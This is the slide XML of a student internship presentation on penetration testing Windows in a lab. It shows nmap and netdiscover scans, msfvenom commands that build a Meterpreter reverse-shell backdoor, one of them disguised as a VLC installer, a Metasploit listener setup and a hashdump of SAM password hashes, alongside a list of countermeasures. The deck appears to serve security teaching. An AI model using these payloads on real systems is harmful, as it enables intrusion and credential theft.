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5-1.png>
</file>

<file path=ppt/media/image-5-2.png>
</file>

<file path=ppt/media/image-5-3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899636"/>
            <a:ext cx="13042821" cy="4253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AFCBF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Penetration Testing</a:t>
            </a:r>
            <a:pPr algn="ctr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on Windows OS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793790" y="5492829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Cyber Security Summer School Internship Project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793790" y="69669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Rameshwar Verma (2023a1r054)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2076" y="692229"/>
            <a:ext cx="7852648" cy="23867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250"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="50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Strengthening Defenses: Key Takeaways &amp; Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6132076" y="3540085"/>
            <a:ext cx="3701296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Conclusion of Attack Lifecycle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6132076" y="4416266"/>
            <a:ext cx="3701296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Demonstrated a full penetration testing lifecycle.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132076" y="5070872"/>
            <a:ext cx="3701296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Successfully gained access and escalated privileges.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132076" y="5725477"/>
            <a:ext cx="3701296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Showcased data exfiltration and persistence techniques.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10291048" y="3540085"/>
            <a:ext cx="3701296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Essential Countermeasures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291048" y="4416266"/>
            <a:ext cx="3701296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Antivirus &amp; Endpoint Detection (EDR).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10291048" y="5070872"/>
            <a:ext cx="3701296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Enforce strong, unique passwords.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10291048" y="5430441"/>
            <a:ext cx="3701296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Regularly patch and update OS and software.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10291048" y="6085046"/>
            <a:ext cx="3701296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proactive Firewall Monitoring.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6132076" y="6947178"/>
            <a:ext cx="785264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Recommended Defense Tools: Windows Defender, Wireshark, Malwarebytes, GlassWire, NetLimiter.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835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Objectives and Essential Tools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8288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Objectives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7349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Assess vulnerabilities in Windows OS environments.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7718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Execute penetration testing and post-exploitation techniques.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8228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Propose effective countermeasures to bolster security.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082885"/>
            <a:ext cx="434220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Environment &amp; Tools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599521" y="373499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Operating Systems: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Kali Linux (Attacker), Windows 10/11 (Victim)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54009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Scanning &amp; Exploitation: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Nmap, Netdiscover, Metasploit, msfvenom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34519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Post-Exploitation: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John the Ripper, Wireshark, njRAT, VNC Viewer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40544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project simulates a real-world cyberattack scenario to demonstrate the impact of common vulnerabilities and the steps required to mitigate them.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9106" y="1154787"/>
            <a:ext cx="7758589" cy="1237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Initial Reconnaissance: Footprinting &amp; Scanning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179106" y="2688669"/>
            <a:ext cx="7758589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first step involves discovering active hosts and open ports within the target network. This phase is crucial for identifying potential entry points.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179106" y="3742611"/>
            <a:ext cx="2977634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Network Discovery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6179106" y="4274463"/>
            <a:ext cx="3637836" cy="613410"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13553"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6169223" y="4274463"/>
            <a:ext cx="3657600" cy="613410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8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6367105" y="4422815"/>
            <a:ext cx="3261836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ip a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6179106" y="5110520"/>
            <a:ext cx="3637836" cy="613410"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13553"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6169223" y="5110520"/>
            <a:ext cx="3657600" cy="613410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1" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6367105" y="5258872"/>
            <a:ext cx="3261836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netdiscover -r 192.168.1.0/24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6179106" y="5946577"/>
            <a:ext cx="3637836" cy="950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Using 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netdiscover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we identify active IP addresses in the target's subnet, revealing potential victim machines.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10307479" y="3742611"/>
            <a:ext cx="3637836" cy="618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Port &amp; Service Scanning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10307479" y="4583668"/>
            <a:ext cx="3637836" cy="613410"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13553"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10297597" y="4583668"/>
            <a:ext cx="3657600" cy="613410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6" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10495478" y="4732020"/>
            <a:ext cx="3261836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nmap -A -T4 192.168.1.100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10307479" y="5419725"/>
            <a:ext cx="3637836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Nmap</a:t>
            </a:r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provides detailed information about open ports, running services, and operating system versions, crucial for planning our attack.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1610" y="854631"/>
            <a:ext cx="7693581" cy="1294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Target Identification &amp; Firewall Assessment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11610" y="2460308"/>
            <a:ext cx="7693581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Before proceeding, we confirm the target's presence and meticulously scan all ports to identify any hidden services or firewall configurations.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211610" y="3563422"/>
            <a:ext cx="3594021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Host Discovery (ARP Scan)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6211610" y="4443651"/>
            <a:ext cx="3594021" cy="642223"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13551"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6201251" y="4443651"/>
            <a:ext cx="3614738" cy="642223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8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6408420" y="4599027"/>
            <a:ext cx="3200400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nmap -sn 192.168.1.0/24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11610" y="5318879"/>
            <a:ext cx="3594021" cy="642223"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13551"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6201251" y="5318879"/>
            <a:ext cx="3614738" cy="642223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1" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6408420" y="5474256"/>
            <a:ext cx="3200400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arp -a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211610" y="6194108"/>
            <a:ext cx="3594021" cy="994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 ARP scan quickly identifies active hosts on the local network, confirming our target's availability.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318790" y="3563422"/>
            <a:ext cx="3594021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Comprehensive Port Scan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10318790" y="4443651"/>
            <a:ext cx="3594021" cy="973693"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8938"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10308431" y="4443651"/>
            <a:ext cx="3614738" cy="973693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6" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10515600" y="4599027"/>
            <a:ext cx="3200400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nmap -p 1-65535 -T4 -A -v 192.168.1.100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0318790" y="5650349"/>
            <a:ext cx="3594021" cy="1325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aggressive full-port scan helps bypass basic firewall rules and uncover less common open ports that could be exploited.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042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3179" y="2991564"/>
            <a:ext cx="10755392" cy="601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Exploitation: Crafting the Backdoor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3179" y="3881080"/>
            <a:ext cx="13284041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create malicious payloads designed to establish a reverse shell connection with the attacker machine. Two common methods are demonstrated.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73179" y="4693682"/>
            <a:ext cx="6545818" cy="2948464"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3722"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673179" y="4670822"/>
            <a:ext cx="6545818" cy="91440"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 88348"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="26A688"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4405193"/>
            <a:ext cx="576977" cy="576977"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 158481"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="26A688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717" y="4549378"/>
            <a:ext cx="230743" cy="28848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88325" y="5174456"/>
            <a:ext cx="359604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Stand-alone Executable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888325" y="5691188"/>
            <a:ext cx="6115526" cy="903923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11" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878800" y="5691188"/>
            <a:ext cx="6134576" cy="903923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2" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071086" y="5835372"/>
            <a:ext cx="5750004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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe &gt; backdoor.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888325" y="6811447"/>
            <a:ext cx="6115526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Generates a basic Meterpreter executable payload, ideal for direct delivery.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7411283" y="4693682"/>
            <a:ext cx="6545937" cy="2948464"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3722"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7411283" y="4670822"/>
            <a:ext cx="6545937" cy="91440"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 88348"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="26A688"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10395704" y="4405193"/>
            <a:ext cx="576977" cy="576977"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 158481"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="26A688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8821" y="4549378"/>
            <a:ext cx="230743" cy="288488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7626429" y="5174456"/>
            <a:ext cx="2438519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Payload Binding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7626429" y="5691188"/>
            <a:ext cx="6115645" cy="903923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20" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7616904" y="5691188"/>
            <a:ext cx="6134695" cy="903923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21" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7809190" y="5835372"/>
            <a:ext cx="5750123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msfvenom -x vlcsetup.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o bindedvlc.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7626429" y="6811447"/>
            <a:ext cx="6115645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Embeds the payload within a legitimate application (e.g., VLC setup), making it less suspicious to the user.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6981" y="476964"/>
            <a:ext cx="10702052" cy="541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Gaining Access: Setting Up the Listener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06981" y="1365766"/>
            <a:ext cx="13416439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With the backdoor prepared, we configure Metasploit to listen for incoming connections, establishing a Meterpreter session.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06981" y="2011680"/>
            <a:ext cx="4657725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Metasploit Listener Configuration</a:t>
            </a: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606981" y="2477691"/>
            <a:ext cx="7880509" cy="537567"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13552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598408" y="2477691"/>
            <a:ext cx="7897654" cy="537567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771763" y="2607707"/>
            <a:ext cx="7550944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msfconsole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606981" y="3210282"/>
            <a:ext cx="7880509" cy="537567"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13552"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598408" y="3210282"/>
            <a:ext cx="7897654" cy="537567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0" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771763" y="3340298"/>
            <a:ext cx="7550944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 exploit/multi/handler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606981" y="3942874"/>
            <a:ext cx="7880509" cy="537567"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13552"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598408" y="3942874"/>
            <a:ext cx="7897654" cy="537567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3" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771763" y="4072890"/>
            <a:ext cx="7550944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 PAYLOAD windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606981" y="4675465"/>
            <a:ext cx="7880509" cy="537567"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13552"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598408" y="4675465"/>
            <a:ext cx="7897654" cy="537567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6" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771763" y="4805482"/>
            <a:ext cx="7550944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 LHOST 192.168.1.101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606981" y="5408057"/>
            <a:ext cx="7880509" cy="537567"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13552"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598408" y="5408057"/>
            <a:ext cx="7897654" cy="537567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9" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771763" y="5538073"/>
            <a:ext cx="7550944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 LPORT 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606981" y="6140648"/>
            <a:ext cx="7880509" cy="537567"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13552"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598408" y="6140648"/>
            <a:ext cx="7897654" cy="537567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22" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771763" y="6270665"/>
            <a:ext cx="7550944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exploit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606981" y="6873240"/>
            <a:ext cx="7880509" cy="555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sequence of commands sets up a generic handler in Metasploit, waiting for the victim to execute our payload.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2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8258" y="2033349"/>
            <a:ext cx="5112663" cy="5112663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8918258" y="7341037"/>
            <a:ext cx="5112663" cy="555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Once the victim executes the backdoor, a Meterpreter session is established, granting us control.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66936" y="597694"/>
            <a:ext cx="8182928" cy="857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Post-Exploitation: Data &amp; Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5966936" y="1661636"/>
            <a:ext cx="8182928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After gaining initial access, we escalate privileges and extract crucial system and user information, including password hashes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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6936" y="2035612"/>
            <a:ext cx="343257" cy="34325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481762" y="2117050"/>
            <a:ext cx="2031444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System &amp; User Info</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6481762" y="2486025"/>
            <a:ext cx="7668101" cy="425529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13554"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6474976" y="2486025"/>
            <a:ext cx="7681674" cy="425529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6612255" y="2589014"/>
            <a:ext cx="7407116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sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6481762" y="3065978"/>
            <a:ext cx="7668101" cy="425529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13554"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6474976" y="3065978"/>
            <a:ext cx="7681674" cy="425529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6612255" y="3168967"/>
            <a:ext cx="7407116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getuid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6481762" y="3645932"/>
            <a:ext cx="7668101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Collects detailed system information and confirms our current user ID, vital for understanding the environment.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="105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936" y="4208740"/>
            <a:ext cx="343257" cy="343257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481762" y="4290179"/>
            <a:ext cx="1757482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Hash Extraction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6481762" y="4659154"/>
            <a:ext cx="7668101" cy="425529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13554"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6474976" y="4659154"/>
            <a:ext cx="7681674" cy="425529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6612255" y="4762143"/>
            <a:ext cx="7407116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hashdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6481762" y="5239107"/>
            <a:ext cx="7668101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Dumps all user password hashes from the SAM database for cracking.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody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6936" y="5801916"/>
            <a:ext cx="343257" cy="34325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6481762" y="5883354"/>
            <a:ext cx="2223730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Admin User Creation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
